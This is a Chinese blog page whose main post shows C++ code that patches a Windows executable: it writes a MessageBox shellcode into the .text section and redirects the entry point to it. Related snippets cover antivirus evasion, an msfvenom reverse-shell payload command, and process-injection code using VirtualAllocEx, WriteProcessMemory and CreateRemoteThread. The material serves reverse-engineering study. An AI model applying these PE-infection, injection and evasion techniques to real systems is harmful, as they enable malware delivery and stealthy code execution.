在.text节中写入shellcode

原创 已于 2024-04-02 00:52:16 修改 · 204 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#c++ #c语言 #操作系统

于 2024-04-01 21:27:42 首次发布
文章描述了一个使用C++实现的函数,通过读取并操作Windows可执行文件的imageBuffer,修改程序的地址偏移,将shellcode插入到程序的入口点,以实现代码注入。作者通过实际操作展示了如何在内存中定位和修改代码,以及将修改后的imageBuffer保存回文件的过程。 
/*个人是拉伸成imageBuffer写的所以更难计算,不过也当磨练自己了*/
BOOL test() {
	//&MessageBox = 750F10E0
	//读取到imagebuffer 并且套入Headers
	PVOID pFileBuffer =  FileToFileBuffer("C:\\Users\\12459\\Downloads\\1.exe");
	PVOID pImageBuffer = FileBufferToImageBuffer(pFileBuffer);
	PIMAGE_DOS_HEADER pDosHeader = pImageBuffer;
	PIMAGE_NT_HEADERS pNTHeader = (DWORD)pDosHeader + pDosHeader->e_lfanew;
	PIMAGE_FILE_HEADER pFileHeader = &pNTHeader->FileHeader;
	PIMAGE_OPTIONAL_HEADER pOptHeader = (DWORD)pFileHeader + sizeof(IMAGE_FILE_HEADER);
	PIMAGE_SECTION_HEADER pSecHeader = (DWORD)pOptHeader + pFileHeader->SizeOfOptionalHeader;
	//定位需要在内存种哪个位置写入
	PVOID pWritePosition = (DWORD)pImageBuffer +  pSecHeader->VirtualAddress +pSecHeader->Misc.VirtualSize;
	//改变OEP
	pOptHeader->AddressOfEntryPoint = (DWORD)pWritePosition - (DWORD)pImageBuffer;
	//写入shellcode E8后面应该是 MessageBoxA-(ImageBase + VA + VS + 9 + 5) | E9 EOP - (ImageBase + VA + VS + E + 5)
	/* 算了一堆最后发现不如拖进dbg让他帮忙算*/
	BYTE shellcode[] = { 0x6a,0x00,0x6a,0x00,0x6a,0x00,0x6a,0x00,0xe8,0xD9,0x42,0xcd,0x74,0xe9,0x12,0xc9,0xff,0xff };
	memcpy(pWritePosition, shellcode, sizeof(shellcode));
	//存盘
	pImageBuffer = ImageBufferToFileBuffer("C:\\Users\\12459\\Downloads\\111.exe", pImageBuffer);
	if (!pImageBuffer) {
		printf("fwrite failed\n");
		return FALSE;
	}
	free(pImageBuffer);
	return TRUE;
}
123qweqew
关注
免杀技术(高级中的基础手法)之PE扩大注入ShellCode
盾悟
10-08 1万+
本文详细解析了PE文件免杀技术中的扩大注入Shellcode方法。该技术通过修改PE结构,在扩展中注入加密Shellcode,结合花指令混淆和反调试机制,提升隐蔽性。核心步骤包括:解析PE头结构、扩展/添加新、注入加密Shellcode、设置入口点劫持及反调试功能。文章提供了完整的C语言实现代码示例,并指出该技术对传统杀软的绕过率可达50-80%,但对EDR效果有限。这种中等偏上的技术适合入门学习,但需注意合法使用。
免杀对抗—python&混淆算法&反序列化&shellcode
2301_76227305的博客
09-23 1358
上面的测试可以看到想实现真正的免杀还是比较难的,因为上面我们使用的加密方式都是公开的,公开的东西想要实现免杀基本是很难的,或者说时效性短,可能这个公开的脚步今天能免杀成功,明天就不行了。除非是自己写的加密脚本,或者自己创造一个加密算法,这样子的免杀效果就会比较好。而且我们上面加载器,使用的分配内存用的VirtualAlloc 函数,早已经被国内几大厂商监控烂了,想要加强免杀效果只能用一下比较冷门的函数了。
滴水逆向----代码区添加shellcode
clayoa的博客
01-09 873
上次海哥讲到FileBuffer------>ImageBuffer,这次我们需要在代码区添加代码 我们这次要添加的代码功能:双击exe,先跳出MessageBox,然后软件正常使用 需要的知识点: 1.我们添加的代码不是c,不是汇编,而是二进制,因为exe都是二进制组成的,我们要知道一些汇编的硬编码,call的硬编码是E8,jmp的硬编码是E9 2.知道了call的硬编码,那么后面的地址是直接用编译器打开的地址吗?不是的,地址是经过转换得到的,公式:真正要跳转的地址=E8下一条指令的地址+X
ShellCode
weixin_46661122的博客
11-16 1196
关于利用图片Alpha通道隐写术隐藏Shellcode的攻击 Alpha通道,又叫做阿尔法通道,是指一张图片的透明和半透明度。例如:一个使用16位存储的图片,可能5位表示红色,5位表示绿色,5位表示蓝色,1位是阿尔法。在这种情况下,它要么表示透明要么不是。一个使用32位存储的图片,每8位表示红绿蓝,和阿尔法通道。在这种情况下,就不光可以表示透明还是不透明,阿尔法通道还可以表示256级的半透明度。 一般alpha值取0~1之间。通道分为三种通道。也就是有三个作用。 Alpha通道与Rgb图片为乘法运算即:图片
CS 4.7 Stager 逆向及 Shellcode 重写3234
stopluox的博客
09-27 1087
一直很想有一个自己的控,奈何实力不允许,CS 仍然是目前市面上最好用的控,但是也被各大厂商盯得很紧,通过加载器的方式进行免杀效果有限,后来看到有人用 go 重写了 CS 的 beacon,感觉这个思路很好,但是 go 编译的也有很多问题,加载起来会有很多受限的地方,所以想着能不能用 C 去重写一个,不过 beacon 的功能很多,短时间去重写有点费劲,所以想先重写 CS 的 stager 部分,并能转化成 shellcode 通过加载器进行加载。
Linux pwn入门教程(2)——shellcode的使用,原理与变形
dfdhxb995397的博客
07-03 829
作者:Tangerine@SAINTSEC 0×00 shellcode的使用 在上一篇文章中我们学习了怎么使用栈溢出劫持程序的执行流程。为了减少难度,演示和作业题程序里都带有很明显的后门。然而在现实世界里并不是每个程序都有后门,即使是有,也没有那么好找。因此,我们就需要使用定制的shellcode来执行自己需要的操作。 首先我们把演示程序~/Openctf 2016-tyro_s...
网络攻防快速入门笔记pwn | 02 栈溢出题型 | 2.1 ret2text和ret2shellcode
qq_41040989的博客
03-31 1063
将返回地址覆盖为程序.text中已有代码的地址,从而执行本身的代码,由于我们要获得shell,二进制文件中本身就含有一个可以直接获取权限的函数,然后我们通过栈溢出漏洞,控制程序执行留,将返回地址覆盖为这个函数的地址让文件运行这个获取权限的函数,我们就可以拿到权限,进而获取flag。程序会把栈的地址输出,然后我们接收程序输出的栈地址,然后向栈中输入shellcode,通过栈溢出跳到输入shellcode的位置,最终获取shell。获取到系统权限之后,就可以输入相应的linux命令,一般用到。
第六十八课:基于Ruby内存加载shellcode第一季.docx
09-15
#### 写入shellcodeshellcode写入之前分配的内存中。 ```ruby Fiddle::Memory.write(ptr, shellcode, :pointer) ``` #### 调整内存权限 在执行shellcode之前,可能还需要调整内存权限,确保它可以被执行。 `...
linux x64 shellcode,栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(二)shellcode...
weixin_42386033的博客
05-12 646
shellcode 是一组指令opcode, 是可以被程序运行,因为shellcode是要直接操作寄存器和函数,所以opcode 必须是十六进制的形式。既然是攻击,那shellcode 主要的目的是调用系统函数,而在x86下 在linux下有两种方式。第一种是通过直接调用中断 int 0x80进入内核态,从而达到调用目的。第二种是通过调用libc里syscall(64位)和sysenter(32位...
pe植入shellcode
m0_46377671的博客
11-29 741
shellcode是一个弹窗,为: fc686a0a381e686389d14f683274910c8bf48d7ef433dbb7042be366bb33325368757365725433d2648b5a308b4b0c8b491c8b098b6908ad3d6a0a381e750595ff57f895608b453c8b4c057803cd8b592003dd33ff478b34bb03f5990fbe063ac47408c1ca0703d046ebf13b54241c75e48b592403dd66
手把手简易实现shellcode及详解
3-Number
06-22 6737
转载理由: 处于安全行业靠边产业,经常听和看到shellcode,但是只有模糊的认识,于是学习一把,毕竟C和汇编了解,开阔下视野; 转载于:http://blog.nsfocus.net/simple-realization-hand-handle-shellcode-detailed-explanation/?utm_source=tuicool&utm_medium=referral
免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall
xiaoheizi的博客
09-13 1418
1.生成或者python2.打开pycharm工具,创建一个py文件,将原生态执行代码复制进去shellcode3.将生成的shellcode放到执行代码中,运行代码,cs成功上线1.执行命令,生成shellcode命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.129 lport=4444 -f c2.msf设置监听3.shellcode放到执行脚本中运行。
Shellcode编程:实现表存放
2301_79326930的博客
09-20 98
Shellcode是一用于利用软件漏洞或执行特定操作的机器码。它通常是短小精悍的,用于执行特定任务,例如获取系统权限或执行远程命令。Shellcode通常以二进制形式存在,因此可以直接在内存中执行。
shellcode执行
Xor0ne
03-04 1364
刚有点思路,所以就试着边理清思路边写代码吧! 我是将一个弹出messagebox的代码为例子,制成shellcode。 然后再分成三分别根据不同的xor进行加密,然后在边解密边执行。 我的计划是最后执行的时候只有两部分代码,一个是内嵌汇编 _asm{}执行语句,一个是encode[]边解密边执行的语句。 首先,内嵌汇编如下: _asm { lea eax,encode add eax, 10...
C++课后习题训练记录Day38
zmzb0103的博客
11-29 276
在蓝桥云课中选择课程《16届蓝桥杯省赛无忧班(C&C++ 组)4期》,选择第一章中“竞赛常用库函数”课程7并开始练习。输入一个字符,判断其为大写还是小写,若为大写则转换为小写,若为小写则转换为大写,输出转换后的值。(3)练习心得:注意每代码末尾的分号是否存在,如不存在则需即使补充;对此代码进行检验,检验后无报错,提交此代码,判题结果为正确100分。是否切换为英语模式;
STL和string实现
最新发布
An15294874732的博客
11-30 820
标准模板库。
c++ opencv缺少openh264-1.8.0-win64.dll
ivanwfy的专栏
11-30 137
openh264-1.8.0-win64.dll下载。下载之后复制到opencv的dll所在目录bin里面。c++ opencv处理视频的时候可能会出现。
【C语言】struct结构体内存对齐和位(超详解)
zore__的博客
11-30 1178
本文详细介绍了C语言中结构体的概念和使用方法。结构体是自定义数据类型,用于描述现实中的复杂对象,如学生信息包含姓名、年龄、成绩等不同类型数据。文章讲解了结构体的声明、定义、初始化方法,以及通过点操作符(.)和箭头操作符(->)访问结构体成员的方式。此外还介绍了结构体数组和结构体指针的使用场景,展示了如何用结构体存储和处理多个同类型数据。这些知识对理解和使用C语言中的复杂数据类型非常有帮助。
C++ 实操
淡水瑜的博客
11-28 357
编译 C++ 代码需要依赖gcc/g++这类编译器程序(MinGW-w64、TDM-GCC 都是 Windows 下常用的免费 C++ 编译器)。2、插件2 : 搜索安装 C/C++ Compile Run,插件右上方,配置settings修改对应路径。1、插件1 :搜索安装 C/C++(Microsoft Official)3、配置环境变量 PATH,新增C:\mingw64\bin。2、解压后,放到路径 C:\mingw64。Windows 64位系统。Vscode IDE工具。
shellcode内存注入
04-24
<think>好的,用户想了解关于shellcode内存注入的技术细和实现方法。首先,我需要回顾一下之前提供的引用内容,看看有哪些相关的信息可以整合。 引用1和2提到了将shellcode注入到自身进程或远程进程的例子,特别是使用特定的工具如LyInjector和LySocket。引用3讨论了内核级的ShellCode线程注入,而引用4则详细说明了内存注入的优势,比如低检测概率,因为它不涉及硬盘文件。 用户的问题集中在技术细和实现方式上,所以需要分步骤解释内存注入的流程。可能需要包括分配内存、写入shellcode、执行这三个主要步骤。同时,不同注入类型也需要区分,比如自身进程注入和远程进程注入,以及内核级注入。 另外,用户可能对实现中的关键API函数感兴趣,比如VirtualAllocEx、WriteProcessMemory、CreateRemoteThread等。需要确保这些技术术语的正确使用,并适当用中文解释清楚。 还要注意提到的防御机制,比如内存保护属性(如PAGE_EXECUTE_READWRITE)和现代系统的防护措施(如DEP和ASLR),这有助于用户全面理解技术的局限性和应对方法。 最后,生成相关问题时,要覆盖技术原理、关键函数、防御绕过、应用场景和工具实现等方面,确保问题具有针对性和扩展性,帮助用户进一步深入学习。</think>### ShellCode内存注入技术解析 ShellCode内存注入是通过将可执行代码直接写入目标进程内存并触发执行的攻击技术,其核心实现可分为以下步骤: #### 一、技术原理与实现步骤 1. **内存分配** 使用$VirtualAlloc/VirtualAllocEx$函数在目标进程分配可执行内存区域: ```c LPVOID pRemoteMemory = VirtualAllocEx(hProcess, NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); ``` 需设置内存保护属性为$PAGE_EXECUTE_READWRITE$以允许执行[^4] 2. **代码写入** 通过$WriteProcessMemory$将ShellCode写入目标内存: ```c WriteProcessMemory(hProcess, pRemoteMemory, shellcode, shellcodeSize, NULL); ``` 3. **执行触发** 创建远程线程或修改线程上下文来执行代码: ```c CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteMemory, NULL, 0, NULL); ``` #### 二、主要注入类型 1. **自身进程注入** 直接修改当前进程内存空间,常用于规避检测: ```c void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, shellcode, sizeof(shellcode)); ((void(*)())exec)(); ``` 如引用[1]中的`InjectSelfShell`实现 2. **远程进程注入** 需先获取目标进程句柄$hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid)$,适用于权限维持场景[^3] 3. **反射式注入** 不依赖Windows API加载PE文件,通过手动实现内存映射执行 #### 三、防御规避技术 1. **内存属性混淆** 使用$VirtualProtect$动态修改内存页属性 ```c DWORD oldProtect; VirtualProtect(pMemory, size, PAGE_EXECUTE_READ, &oldProtect); ``` 2. **进程镂空(Process Hollowing)** 创建挂起进程后替换其内存镜像 3. **异步过程调用(APC)** 利用$QueueUserAPC$实现线程劫持 #### 四、现代系统防护 1. **数据执行保护(DEP)** 需配合ROP链绕过内存执行限制 2. **地址空间随机化(ASLR)** 要求ShellCode具备位置无关特性 $$ \text{注入成功率} = \frac{\text{成功执行次数}}{\text{总尝试次数}} \times 100\% $$
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值